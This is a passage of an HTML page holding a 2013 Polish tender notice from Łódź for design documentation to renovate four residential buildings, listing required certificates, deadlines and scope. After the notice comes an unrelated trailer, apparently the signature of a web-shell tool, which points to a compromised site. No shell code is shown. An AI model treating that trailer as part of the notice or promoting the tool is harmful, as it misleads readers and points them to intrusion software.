<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Przewiduje się możliwość dokonania istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, możliwych do dokonania z powodu zaistnienia okoliczności niemożliwych do przewidzenia w chwili zawarcia umowy lub w przypadku wystąpienia którejkolwiek z następujących sytuacji:
1- gdy zmianie ulegnie urzędowa stawka podatku VAT - Zamawiający dopuszcza możliwość zmiany wysokości wynagrodzenia umownego,
2  - ze względu na braku dostępu do lokali czasowo uniemożliwiający realizację umowy lub w przypadku przedłużających się procedur administracyjnych mających wpływ na termin realizacji przedmiotu umowy lub niezawinionej przez wykonawcę odmowy wydania przez uprawnione organy decyzji, zezwoleń, uzgodnień - Zamawiający dopuszcza możliwość zmiany terminu wykonania umowy o czas opóźnienia, na pisemny wniosek Wykonawcy, wyłącznie za zgodą Zamawiającego i po aktualizacji terminu zabezpieczenia należytego wykonania umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.centrum1@com3.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Administracja Nieruchomościami Łódź-Śródmieście CENTRUM I - 90-103 Łódź ul. Piotrkowska 86 pokój nr 301.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.07.2013 godzina 11:30, miejsce: Administracja Zasobów Komunalnych  Łódź-Środmieście CENTRUM I 90-103 Łódź ul. Piotrkowska 86 pokój nr 201 I piętro (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część I - Tuwima 46.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dokumentacja musi zawierać w szczególności projekty budowlane i wykonawcze:
1. W zakresie termomodernizacji: 
1.1 - projekt docieplenia stropu parteru i nad ostatnią   kondygnacją oraz szczytowych elewacji budynków, zestawienie stolarki okiennej i drzwiowej do wymiany,
1.2 - projekt instalacji CO i CWU oraz adaptacji pomieszczenia na węzeł lub w przypadku braku możliwości podłączenia budynków do sieci ciepłowniczej zaprojektowanie innego sposobu ogrzewania ( np. gazowe )
2. W zakresie przebudowy lokali mieszkalnych i użytkowych - projekt zmiany struktury lokali w kierunku poprawy ich funkcjonalności i umożliwiającym stwierdzenie  samodzielności,
3. W zakresie dotyczącym całego budynku projekty:
3.1 - wzmocnienia stropów,
3.2- remontu klatek schodowych z uwzględnieniem piwnic i pomieszczeń strychowych,
3.3 - remontu lub wymiany więźby dachowej i pokrycia dachu,
3.4 - izolacji przeciwwilgociowej pionowej i poziomej 
3.5 - remontu wszystkich elewacji i prześwitu bramowego z kolorystyką, 
3.6 - wymiany instalacji wodnej - od wodomierza głównego oraz  kanalizacyjnej w budynkach i pod nawierzchnią podwórza, ( mapa do celów projektowych ),
3.7 - wymiany instalacji elektrycznej, oraz instalacji domofonowej połączonej z bramą i do odbioru RTV,
3.8 - wymiany  instalacji gazowej,
4. Projekt wykonania nawierzchni z kostki betonowej w podwórzu i prześwicie bramowym, powierzchnia - 554 m2 wraz z projektem zagospodarowania terenu i pomieszczenia do gromadzenia odpadów.
5. Inwentaryzację budowlaną powykonawczą wszystkich budynków w skali 1:100 oraz wizualizację z planem zagospodarowania terenu. 
6. Dla wszystkich projektów opracowany na całość oraz odrębnie na każdy budynek:
- kosztorys inwestorski, 
- przedmiar robót oraz specyfikacja techniczna wykonania i odbioru robót, umożliwiające wykonanie robót w podziale na etapy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6, 71.22.10.00-3, 71.24.00.00-2, 71.24.20.00-6, 71.24.50.00-7, 71.24.80.00-8, 71.25.00.00-5, 71.32.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część II - Zachodnia 76.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dokumentację należy opracować ściśle zgodnie z wytycznymi Wojewódzkiego Urzędu Ochrony Zabytków oraz orzeczeniem technicznym o stanie budynków w zakresie w jakim opracowanie to nie jest sprzeczne z w/w wytycznymi lub uzyskać odstępstwa, a z uwagi na planowaną zmianę funkcji budynku z mieszkalnej na użytkową również decyzją o warunkach zabudowy.

Dokumentacja musi zawierać w szczególności projekty budowlane i wykonawcze:
1. W zakresie termomodernizacji: 
1.1 - projekt docieplenia stropu parteru i nad ostatnią   kondygnacją oraz szczytowych elewacji budynków, zestawienie stolarki okiennej i drzwiowej do wymiany,
1.2 - projekt instalacji CO i CWU oraz adaptacji pomieszczenia na węzeł lub w przypadku braku możliwości podłączenia budynku do sieci ciepłowniczej zaprojektowanie innego sposobu ogrzewania ( np. gazowe ),  
2. W zakresie przebudowy lokali - projekt uwzględniający zmianę funkcji z mieszkalnej na użytkową. 
3. W zakresie dotyczącym całego budynku z uwzględnieniem zmiany sposobu użytkowania po uprzednim uzyskaniu decyzji o warunkach zabudowy projekty:
3.1 - wzmocnienia lub wymiany stropów,
3.2 - remontu klatki schodowej z uwzględnieniem piwnic i pomieszczeń strychowych,
3.3 - remontu lub wymiany więźby dachowej i pokrycia dachu,
3.4 - izolacji przeciwwilgociowej pionowej i poziomej 
3.5 - remontu wszystkich elewacji z kolorystyką,
3.6 - wymiany instalacji wodnej - od wodomierza głównego oraz  kanalizacyjnej w budynku i pod nawierzchnią podwórza,
3.7 - wymiany instalacji elektrycznej, oraz instalacji domofonowej i do odbioru RTV,
3.8 - wymiany  instalacji gazowej,
4. Projekt wykonania nawierzchni z kostki w podwórzu powierzchnia 
- 371 m2 wraz z projektem zagospodarowania terenu i pomieszczenia do gromadzenia odpadów.
5. Inwentaryzację budowlaną powykonawczą budynku w skali 1:100 oraz wizualizację z planem zagospodarowania terenu. 
6. Dla wszystkich projektów :
- kosztorys inwestorski, 
- przedmiar robót oraz specyfikacja techniczna wykonania i odbioru robót..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6, 71.22.10.00-3, 71.24.00.00-2, 71.24.20.00-6, 71.24.50.00-7, 71.24.80.00-8, 71.25.00.00-5, 71.32.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 16.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część III -  Zachodnia 99.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dokumentacja musi zawierać w szczególności projekty budowlane i wykonawcze:
1. W zakresie termomodernizacji: 
1.1 - projekt docieplenia stropów parteru i nad ostatnią   kondygnacją oraz szczytowych elewacji budynków, zestawienie stolarki okiennej i drzwiowej do wymiany,
1.2 - projekt instalacji CWU i rozbudowy - modernizacji instalacji CO oraz remontu pomieszczenia węzła,  
2. W zakresie przebudowy lokali mieszkalnych i użytkowych - projekt zmiany struktury lokali w kierunku poprawy ich funkcjonalności i umożliwiającym stwierdzenie  samodzielności,
3. W zakresie dotyczącym całego budynku projekty:
3.1 - wzmocnienia lub wymiany stropów,
3.2 - wymiany lub remontu klatek schodowych z uwzględnieniem piwnic i pomieszczeń strychowych,
3.3 - remontu lub wymiany więźby dachowej i pokrycia dachu,
3.4 - izolacji przeciwwilgociowej pionowej i poziomej ,
3.5 - remontu wszystkich elewacji i prześwitu bramowego z kolorystyką,
3.6 - wymiany instalacji wodnej - od wodomierza głównego oraz  kanalizacyjnej w budynkach i pod nawierzchnią podwórza,
3.6 - wymiany instalacji elektrycznej,
3.7 - wymiany  instalacji gazowej,
4. Projekt wykonania nawierzchni z kostki betonowej w podwórzu powierzchnia - 584 m2 wraz z projektem zagospodarowania terenu i pomieszczenia do gromadzenia odpadów.
5. Inwentaryzację budowlaną powykonawczą budynku w skali 1:100 oraz wizualizację z planem zagospodarowania terenu. 
6. Dla wszystkich projektów opracowany na całość oraz odrębnie na każdy budynek:
- kosztorys inwestorski, 
- przedmiar robót oraz specyfikacja techniczna wykonania i odbioru robót, umożliwiające wykonanie robót w podziale na etapy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6, 71.22.10.00-3, 71.24.00.00-2, 71.24.20.00-6, 71.24.50.00-7, 71.24.80.00-8, 71.25.00.00-5, 71.32.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Część IV - Zielona  6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dokumentację należy opracować ściśle zgodnie z wytycznymi Miejskiego Konserwatora Zabytków oraz orzeczeniem technicznym o stanie budynków w zakresie w jakim opracowanie to nie jest sprzeczne z w/w wytycznymi lub uzyskać odstępstwa. Z uwagi na planowaną zmianę funkcji mieszkalnej na użytkową w budynku frontowym  należy uzyskać decyzję o warunkach zabudowy.
Dokumentacja musi zawierać w szczególności projekty budowlane i wykonawcze:
1. W zakresie termomodernizacji: 
1.1 - projekt docieplenia stropu parteru i nad ostatnią   kondygnacją oraz szczytowych elewacji budynków, zestawienie stolarki okiennej i drzwiowej do wymiany,
1.2 - projekt instalacji CO i CWU oraz adaptacji pomieszczenia na węzeł lub w przypadku braku możliwości podłączenia budynku do sieci ciepłowniczej zaprojektowanie innego sposobu ogrzewania ( np. gazowe ),  
2. W zakresie przebudowy lokali mieszkalnych i użytkowych - projekt zmiany struktury lokali w kierunku poprawy ich funkcjonalności i umożliwiającym stwierdzenie  samodzielności,
3. W zakresie dotyczącym całego budynku projekty:
3.1 - wzmocnienia lub wymiany stropów,
3.2 - wymiany lub remontu klatek schodowych z uwzględnieniem piwnic i pomieszczeń strychowych,
3.3 - remontu lub wymiany więźby dachowej i pokrycia dachu,
3.4 - izolacji przeciwwilgociowej pionowej i poziomej ,
3.5 - remontu wszystkich elewacji i prześwitu bramowego z kolorystyką,
3.6 - wymiany instalacji wodnej - od wodomierza głównego oraz  kanalizacyjnej w budynkach i pod nawierzchnią podwórza,
3.7 - wymiany instalacji elektrycznej,
3.8 - wymiany  instalacji gazowej,
4. Projekt wykonania nawierzchni z kostki  w podwórzu powierzchnia - 251 m2 wraz z projektem zagospodarowania terenu i pomieszczenia do gromadzenia odpadów.
5. Inwentaryzację budowlaną powykonawczą budynku w skali 1:100 oraz wizualizację z planem zagospodarowania terenu. 
6. Dla wszystkich projektów opracowany na całość oraz odrębnie na każdy budynek:
- kosztorys inwestorski, 
- przedmiar robót oraz specyfikacja techniczna wykonania i odbioru robót, umożliwiające wykonanie robót w podziale na etapy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6, 71.22.10.00-3, 71.24.00.00-2, 71.24.20.00-6, 71.24.50.00-7, 71.24.80.00-8, 71.25.00.00-5, 71.32.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 16.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com